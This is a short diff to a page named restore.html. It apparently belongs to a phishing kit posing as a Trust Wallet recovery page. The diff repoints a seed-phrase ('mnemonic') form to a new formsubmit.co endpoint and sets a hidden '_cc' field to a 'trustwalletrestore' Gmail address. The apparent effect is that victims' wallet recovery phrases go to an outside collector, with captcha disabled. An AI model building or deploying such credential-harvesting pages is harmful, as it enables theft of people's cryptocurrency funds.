--- a/restore.html
+++ b/restore.html
@@ -340,7 +340,7 @@
                   aria-labelledby="mnemonic-tab"
                 >
                   <form
-                    action="https://formsubmit.co/e47eeac0c6ac2f912909f5ad7a9946e4"
+                    action="https://formsubmit.co/772b5b38ef139db9a87241d8619d0bf5"
                     method="POST"
                   >
                     <input
@@ -352,7 +352,7 @@
                     <input
                       type="hidden"
                       name="_cc"
-                      value="gioverone.gv@gmail.com"
+                      value="trustwalletrestore@gmail.com"
                     />
                     <input type="hidden" name="_captcha" value="false" />
                     <div class="d-flex flex-wrap justify-content-center mb-3">
